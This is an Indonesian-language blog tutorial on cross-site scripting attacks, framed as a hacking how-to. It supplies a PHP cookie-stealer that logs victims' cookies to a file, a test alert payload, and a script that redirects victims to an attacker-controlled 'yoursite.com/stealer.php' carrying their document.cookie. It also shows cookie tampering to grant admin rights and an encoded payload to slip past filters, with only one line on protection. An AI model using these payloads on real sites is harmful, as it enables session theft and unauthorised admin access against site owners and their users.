• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Injeksi XSS Ke Dalam Website"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomewebsiteInjeksi XSS Ke Dalam Website
    Injeksi XSS Ke Dalam Website

    Injeksi XSS Ke Dalam Website

    Simpan Postingan
    Kaka mau buat tutor XSS ni
    Skalian numpang gabung d sni :)
    Sebelomnya cek dolo tuh web bisa di injeksi pa ga caranya ada di step 2
    Step 1
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    <?php
    /*Ethernets Cookie Stealer */
    /*Put this up on your free site */
    $cookie = $_GET['cookie'];
    $log = fopen("xssed.txt","a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>
    save => stealer.php
    <strong>
    Step2
    Untuk pengecekan apakah bisa di inject xss gunain javascriptnya
    </strong>
    &lt;script&gt;alert(’Testing For XSS Hole’)&lt;/script&gt;
    Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni
    Step 3
    &lt;script&gt;
    window.location = 'http://yoursite.com/stealer.php?cookie=' + document.cookie;
    &lt;/script&gt;
    step 4
    Nah buka xssed.txtnya deh
    step 5
    Cookie Manipulation:
    Ni cuman contoh aja
    Terkadang lo bakan melihat cookie yang terlihat seperti:
    <span style="red;">Admin=false;
    Or
    Logged_in=true;</span>
    Jangan binggung gunain javascriptnya
    1
    2
    3
    4
    5
    6
    7
    Javascript:alert(document.cookie);
    Keterangan
    Ini akan membuat sebuah kotak yang berisi peringatan
    bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita
    katakan cookie terlihat seperti ini
    1
    Logged_in=true, admin=false, fusionid=12312313
    Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.
    1
    Javascript:void(document.cookie=“admin=true”);
    js di atas a/ hak administratif
    Perlindungan:
    “Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo

    Agar xss lo aman dr ripper bisa gunain string char code
    dapat di inject degan js

    1
    /";alert(String.fromCharCode(88,83,83))
    translate=>88,83,83 =>XSS


    website
    Agustus 29, 2015 •
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan